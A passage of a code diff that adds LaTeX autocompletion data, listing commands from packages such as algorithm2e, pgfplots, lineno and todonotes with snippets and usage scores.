'\\SetKwIF{}{}{}{}{}{}{}{}', + snippet: '\\SetKwIF{$1}{$2}{$3}{$4}{$5}{$6}{$7}{$8}', + meta: 'algorithm2e-cmd', + score: 1.5153751477869614e-5, + }, + { + caption: '\\SetAlgoCaptionSeparator{}', + snippet: '\\SetAlgoCaptionSeparator{$1}', + meta: 'algorithm2e-cmd', + score: 1.5153751477869614e-5, + }, + { + caption: '\\AlCapSty{}', + snippet: '\\AlCapSty{$1}', + meta: 'algorithm2e-cmd', + score: 3.0307502955739227e-5, + }, + { + caption: '\\ArgSty{}', + snippet: '\\ArgSty{$1}', + meta: 'algorithm2e-cmd', + score: 3.0307502955739227e-5, + }, + { + caption: '\\AlCapNameSty{}', + snippet: '\\AlCapNameSty{$1}', + meta: 'algorithm2e-cmd', + score: 3.0307502955739227e-5, + }, + { + caption: '\\SetKwData{}{}', + snippet: '\\SetKwData{$1}{$2}', + meta: 'algorithm2e-cmd', + score: 0.00235652682860263, + }, + { + caption: '\\listalgorithmcfname', + snippet: '\\listalgorithmcfname', + meta: 'algorithm2e-cmd', + score: 1.5075186740106946e-5, + }, + { + caption: '\\Indm', + snippet: '\\Indm', + meta: 'algorithm2e-cmd', + score: 6.068942580823901e-5, + }, + { + caption: '\\SetAlCapNameFnt{}', + snippet: '\\SetAlCapNameFnt{$1}', + meta: 'algorithm2e-cmd', + score: 0.0024294661199612063, + }, + { + caption: '\\DontPrintSemicolon', + snippet: '\\DontPrintSemicolon', + meta: 'algorithm2e-cmd', + score: 0.001062087490197768, + }, + { + caption: '\\SetAlgoLined', + snippet: '\\SetAlgoLined', + meta: 'algorithm2e-cmd', + score: 0.0017151361342403852, + }, + { + caption: '\\SetAlCapSkip{}', + snippet: '\\SetAlCapSkip{$1}', + meta: 'algorithm2e-cmd', + score: 0.0006213942502400296, + }, + { + caption: '\\LinesNotNumbered', + snippet: '\\LinesNotNumbered', + meta: 'algorithm2e-cmd', + score: 1.5153751477869614e-5, + }, + { + caption: '\\SetKwProg{}{}{}{}', + snippet: '\\SetKwProg{$1}{$2}{$3}{$4}', + meta: 'algorithm2e-cmd', + score: 0.0008518783278391971, + }, + { + caption: '\\SetAlgoVlined', + snippet: '\\SetAlgoVlined', + meta: 'algorithm2e-cmd', + score: 1.5153751477869614e-5, + }, + { + caption: '\\SetKwRepeat{}{}{}', + snippet: '\\SetKwRepeat{$1}{$2}{$3}', + meta: 'algorithm2e-cmd', + score: 6.110202388233705e-5, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'algorithm2e-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\chapter{}', + snippet: '\\chapter{$1}', + meta: 'algorithm2e-cmd', + score: 0.422097569591803, + }, + { + caption: '\\SetKwFor{}{}{}{}', + snippet: '\\SetKwFor{$1}{$2}{$3}{$4}', + meta: 'algorithm2e-cmd', + score: 0.00010699539949594301, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'algorithm2e-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'algorithm2e-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'algorithm2e-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'algorithm2e-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'algorithm2e-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'algorithm2e-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\xspace', + snippet: '\\xspace', + meta: 'algorithm2e-cmd', + score: 0.07560370351316588, + }, + ], + tocbibind: [ + { + caption: '\\contentsname', + snippet: '\\contentsname', + meta: 'tocbibind-cmd', + score: 0.010205180337548728, + }, + { + caption: '\\contentsname{}', + snippet: '\\contentsname{$1}', + meta: 'tocbibind-cmd', + score: 0.010205180337548728, + }, + { + caption: '\\tocchapter', + snippet: '\\tocchapter', + meta: 'tocbibind-cmd', + score: 0.00016023188758771694, + }, + { + caption: '\\indexname', + snippet: '\\indexname', + meta: 'tocbibind-cmd', + score: 0.0007544109314450072, + }, + { + caption: '\\listoffigures', + snippet: '\\listoffigures', + meta: 'tocbibind-cmd', + score: 0.03447318897846567, + }, + { + caption: '\\tocfile{}{}', + snippet: '\\tocfile{$1}{$2}', + meta: 'tocbibind-cmd', + score: 0.00016023188758771694, + }, + { + caption: '\\tocbibname', + snippet: '\\tocbibname', + meta: 'tocbibind-cmd', + score: 0.0020762574479507175, + }, + { + caption: '\\settocbibname{}', + snippet: '\\settocbibname{$1}', + meta: 'tocbibind-cmd', + score: 0.00010668677119599426, + }, + { + caption: '\\listoftables', + snippet: '\\listoftables', + meta: 'tocbibind-cmd', + score: 0.02104656820469027, + }, + { + caption: '\\tableofcontents', + snippet: '\\tableofcontents', + meta: 'tocbibind-cmd', + score: 0.13360595130994957, + }, + { + caption: '\\listfigurename', + snippet: '\\listfigurename', + meta: 'tocbibind-cmd', + score: 0.0034407237779350256, + }, + ], + pgfplots: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'pgfplots-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfplots-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfplots-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfplots-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfplots-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfplots-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfplots-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'pgfplots-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'pgfplots-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'pgfplots-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'pgfplots-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'pgfplots-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfplots-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'pgfplots-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfplots-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'pgfplots-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfplots-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfplots-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfplots-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'pgfplots-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'pgfplots-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfplots-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfplots-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'pgfplots-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'pgfplots-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'pgfplots-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'pgfplots-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'pgfplots-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfplots-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'pgfplots-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'pgfplots-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfplots-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'pgfplots-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'pgfplots-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'pgfplots-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'pgfplots-cmd', + score: 0.2864294797053033, + }, + ], + lastpage: [ + { + caption: '\\string', + snippet: '\\string', + meta: 'lastpage-cmd', + score: 0.001042697111754002, + }, + ], + graphics: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'graphics-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'graphics-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'graphics-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'graphics-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'graphics-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'graphics-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'graphics-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'graphics-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'graphics-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'graphics-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'graphics-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'graphics-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'graphics-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'graphics-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'graphics-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'graphics-cmd', + score: 0.008565354665444157, + }, + ], + algorithmic: [ + { + caption: '\\REPEAT', + snippet: '\\REPEAT', + meta: 'algorithmic-cmd', + score: 0.0004816110638193742, + }, + { + caption: '\\ENDIF', + snippet: '\\ENDIF', + meta: 'algorithmic-cmd', + score: 0.003585213685098552, + }, + { + caption: '\\algorithmicwhile', + snippet: '\\algorithmicwhile', + meta: 'algorithmic-cmd', + score: 0.0005769483780443573, + }, + { + caption: '\\algorithmicwhile{}', + snippet: '\\algorithmicwhile{$1}', + meta: 'algorithmic-cmd', + score: 0.0005769483780443573, + }, + { + caption: '\\FOR{}', + snippet: '\\FOR{$1}', + meta: 'algorithmic-cmd', + score: 0.004074774218819945, + }, + { + caption: '\\algorithmicif', + snippet: '\\algorithmicif', + meta: 'algorithmic-cmd', + score: 0.00039654130753044966, + }, + { + caption: '\\algorithmicif{}', + snippet: '\\algorithmicif{$1}', + meta: 'algorithmic-cmd', + score: 0.00039654130753044966, + }, + { + caption: '\\ENDFOR', + snippet: '\\ENDFOR', + meta: 'algorithmic-cmd', + score: 0.004428141530092572, + }, + { + caption: '\\UNTIL', + snippet: '\\UNTIL', + meta: 'algorithmic-cmd', + score: 0.0004816110638193742, + }, + { + caption: '\\UNTIL{}', + snippet: '\\UNTIL{$1}', + meta: 'algorithmic-cmd', + score: 0.0004816110638193742, + }, + { + caption: '\\IF{}', + snippet: '\\IF{$1}', + meta: 'algorithmic-cmd', + score: 0.0036985887706967417, + }, + { + caption: '\\ENSURE', + snippet: '\\ENSURE', + meta: 'algorithmic-cmd', + score: 0.0013188761425395954, + }, + { + caption: '\\algorithmiccomment', + snippet: '\\algorithmiccomment', + meta: 'algorithmic-cmd', + score: 0.00021737766481978388, + }, + { + caption: '\\ENDWHILE', + snippet: '\\ENDWHILE', + meta: 'algorithmic-cmd', + score: 0.00047037943460091465, + }, + { + caption: '\\algorithmicend', + snippet: '\\algorithmicend', + meta: 'algorithmic-cmd', + score: 0.0011128218085672747, + }, + { + caption: '\\algorithmicend{}', + snippet: '\\algorithmicend{$1}', + meta: 'algorithmic-cmd', + score: 0.0011128218085672747, + }, + { + caption: '\\algorithmicrequire', + snippet: '\\algorithmicrequire', + meta: 'algorithmic-cmd', + score: 0.004751598472180266, + }, + { + caption: '\\algorithmicdo', + snippet: '\\algorithmicdo', + meta: 'algorithmic-cmd', + score: 0.0005655570358533174, + }, + { + caption: '\\algorithmicdo{}', + snippet: '\\algorithmicdo{$1}', + meta: 'algorithmic-cmd', + score: 0.0005655570358533174, + }, + { + caption: '\\algorithmicfor', + snippet: '\\algorithmicfor', + meta: 'algorithmic-cmd', + score: 0.0005681785898943757, + }, + { + caption: '\\algorithmicfor{}', + snippet: '\\algorithmicfor{$1}', + meta: 'algorithmic-cmd', + score: 0.0005681785898943757, + }, + { + caption: '\\RETURN', + snippet: '\\RETURN', + meta: 'algorithmic-cmd', + score: 0.0013054907995767408, + }, + { + caption: '\\algorithmicand', + snippet: '\\algorithmicand', + meta: 'algorithmic-cmd', + score: 5.326674280259771e-5, + }, + { + caption: '\\algsetup{}', + snippet: '\\algsetup{$1}', + meta: 'algorithmic-cmd', + score: 0.00012872796177294446, + }, + { + caption: '\\algorithmicreturn{}', + snippet: '\\algorithmicreturn{$1}', + meta: 'algorithmic-cmd', + score: 0.00022490402516652368, + }, + { + caption: '\\algorithmicreturn', + snippet: '\\algorithmicreturn', + meta: 'algorithmic-cmd', + score: 0.00022490402516652368, + }, + { + caption: '\\algorithmicforall{}', + snippet: '\\algorithmicforall{$1}', + meta: 'algorithmic-cmd', + score: 0.00022490402516652368, + }, + { + caption: '\\algorithmicforall', + snippet: '\\algorithmicforall', + meta: 'algorithmic-cmd', + score: 0.00022490402516652368, + }, + { + caption: '\\COMMENT', + snippet: '\\COMMENT', + meta: 'algorithmic-cmd', + score: 0.00025669572555354604, + }, + { + caption: '\\COMMENT{}', + snippet: '\\COMMENT{$1}', + meta: 'algorithmic-cmd', + score: 0.00025669572555354604, + }, + { + caption: '\\REQUIRE', + snippet: '\\REQUIRE', + meta: 'algorithmic-cmd', + score: 0.001870681168192269, + }, + { + caption: '\\algorithmicor', + snippet: '\\algorithmicor', + meta: 'algorithmic-cmd', + score: 5.326674280259771e-5, + }, + { + caption: '\\ELSE', + snippet: '\\ELSE', + meta: 'algorithmic-cmd', + score: 0.0007599864146830139, + }, + { + caption: '\\STATE', + snippet: '\\STATE', + meta: 'algorithmic-cmd', + score: 0.0266684860947573, + }, + { + caption: '\\WHILE{}', + snippet: '\\WHILE{$1}', + meta: 'algorithmic-cmd', + score: 0.00047037943460091465, + }, + { + caption: '\\ELSIF{}', + snippet: '\\ELSIF{$1}', + meta: 'algorithmic-cmd', + score: 0.0001991613148371481, + }, + { + caption: '\\FALSE', + snippet: '\\FALSE', + meta: 'algorithmic-cmd', + score: 3.34222699937868e-5, + }, + { + caption: '\\AND', + snippet: '\\AND', + meta: 'algorithmic-cmd', + score: 6.401730289932545e-5, + }, + { + caption: '\\algorithmicensure', + snippet: '\\algorithmicensure', + meta: 'algorithmic-cmd', + score: 0.003439482525198322, + }, + { + caption: '\\OR', + snippet: '\\OR', + meta: 'algorithmic-cmd', + score: 6.401730289932545e-5, + }, + { + caption: '\\algorithmicrepeat', + snippet: '\\algorithmicrepeat', + meta: 'algorithmic-cmd', + score: 5.326674280259771e-5, + }, + { + caption: '\\TRUE', + snippet: '\\TRUE', + meta: 'algorithmic-cmd', + score: 0.0001336890799751472, + }, + { + caption: '\\FORALL{}', + snippet: '\\FORALL{$1}', + meta: 'algorithmic-cmd', + score: 0.0003533673112726266, + }, + { + caption: '\\algorithmicthen{}', + snippet: '\\algorithmicthen{$1}', + meta: 'algorithmic-cmd', + score: 0.00032476571672371697, + }, + { + caption: '\\algorithmicthen', + snippet: '\\algorithmicthen', + meta: 'algorithmic-cmd', + score: 0.00032476571672371697, + }, + { + caption: '\\algorithmicuntil', + snippet: '\\algorithmicuntil', + meta: 'algorithmic-cmd', + score: 5.326674280259771e-5, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'algorithmic-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'algorithmic-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'algorithmic-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'algorithmic-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'algorithmic-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'algorithmic-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'algorithmic-cmd', + score: 0.00037306820619479756, + }, + ], + lineno: [ + { + caption: '\\pagewiselinenumbers', + snippet: '\\pagewiselinenumbers', + meta: 'lineno-cmd', + score: 0.00016870831850106035, + }, + { + caption: '\\linenomath', + snippet: '\\linenomath', + meta: 'lineno-cmd', + score: 1.4517338420208715e-5, + }, + { + caption: '\\linenumberfont{}', + snippet: '\\linenumberfont{$1}', + meta: 'lineno-cmd', + score: 0.0001811784338695797, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'lineno-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'lineno-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\endlinenomath', + snippet: '\\endlinenomath', + meta: 'lineno-cmd', + score: 1.4517338420208715e-5, + }, + { + caption: '\\nolinenumbers', + snippet: '\\nolinenumbers', + meta: 'lineno-cmd', + score: 0.0009805246614299932, + }, + { + caption: '\\path', + snippet: '\\path', + meta: 'lineno-cmd', + score: 0.028200474217322108, + }, + { + caption: '\\path[]', + snippet: '\\path[$1]', + meta: 'lineno-cmd', + score: 0.028200474217322108, + }, + { + caption: '\\path{}', + snippet: '\\path{$1}', + meta: 'lineno-cmd', + score: 0.028200474217322108, + }, + { + caption: '\\filedate{}', + snippet: '\\filedate{$1}', + meta: 'lineno-cmd', + score: 0.000578146635331119, + }, + { + caption: '\\filedate', + snippet: '\\filedate', + meta: 'lineno-cmd', + score: 0.000578146635331119, + }, + { + caption: '\\linenumbers', + snippet: '\\linenumbers', + meta: 'lineno-cmd', + score: 0.004687680659497865, + }, + { + caption: '\\modulolinenumbers[]', + snippet: '\\modulolinenumbers[$1]', + meta: 'lineno-cmd', + score: 0.0027194991933605197, + }, + { + caption: '\\fileversion{}', + snippet: '\\fileversion{$1}', + meta: 'lineno-cmd', + score: 0.000578146635331119, + }, + { + caption: '\\fileversion', + snippet: '\\fileversion', + meta: 'lineno-cmd', + score: 0.000578146635331119, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'lineno-cmd', + score: 0.008565354665444157, + }, + ], + mathptmx: [ + { + caption: '\\rmdefault', + snippet: '\\rmdefault', + meta: 'mathptmx-cmd', + score: 0.0012870877747432935, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'mathptmx-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'mathptmx-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'mathptmx-cmd', + score: 0.05613164277964739, + }, + ], + todonotes: [ + { + caption: '\\missingfigure[]{}', + snippet: '\\missingfigure[$1]{$2}', + meta: 'todonotes-cmd', + score: 0.001558719179721163, + }, + { + caption: '\\missingfigure', + snippet: '\\missingfigure', + meta: 'todonotes-cmd', + score: 0.001558719179721163, + }, + { + caption: '\\todototoc', + snippet: '\\todototoc', + meta: 'todonotes-cmd', + score: 0.000325977535138643, + }, + { + caption: '\\todo{}', + snippet: '\\todo{$1}', + meta: 'todonotes-cmd', + score: 0.04115074278362878, + }, + { + caption: '\\todo[]{}', + snippet: '\\todo[$1]{$2}', + meta: 'todonotes-cmd', + score: 0.04115074278362878, + }, + { + caption: '\\todo', + snippet: '\\todo', + meta: 'todonotes-cmd', + score: 0.04115074278362878, + }, + { + caption: '\\listoftodos', + snippet: '\\listoftodos', + meta: 'todonotes-cmd', + score: 0.0005325975940754609, + }, + { + caption: '\\listoftodos[]', + snippet: '\\listoftodos[$1]', + meta: 'todonotes-cmd', + score: 0.0005325975940754609, + }, + { + caption: '\\phantomsection', + snippet: '\\phantomsection', + meta: 'todonotes-cmd', + score: 0.0174633138331273, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'todonotes-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'todonotes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'todonotes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'todonotes-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'todonotes-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'todonotes-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'todonotes-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'todonotes-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'todonotes-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'todonotes-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'todonotes-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'todonotes-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'todonotes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'todonotes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'todonotes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'todonotes-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'todonotes-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'todonotes-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'todonotes-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'todonotes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'todonotes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'todonotes-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'todonotes-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'todonotes-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'todonotes-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'todonotes-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'todonotes-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'todonotes-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'todonotes-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'todonotes-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'todonotes-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'todonotes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'todonotes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'todonotes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'todonotes-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'todonotes-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'todonotes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'todonotes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'todonotes-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'todonotes-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'todonotes-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'todonotes-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'todonotes-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'todonotes-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'todonotes-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'todonotes-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'todonotes-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'todonotes-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'todonotes-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: 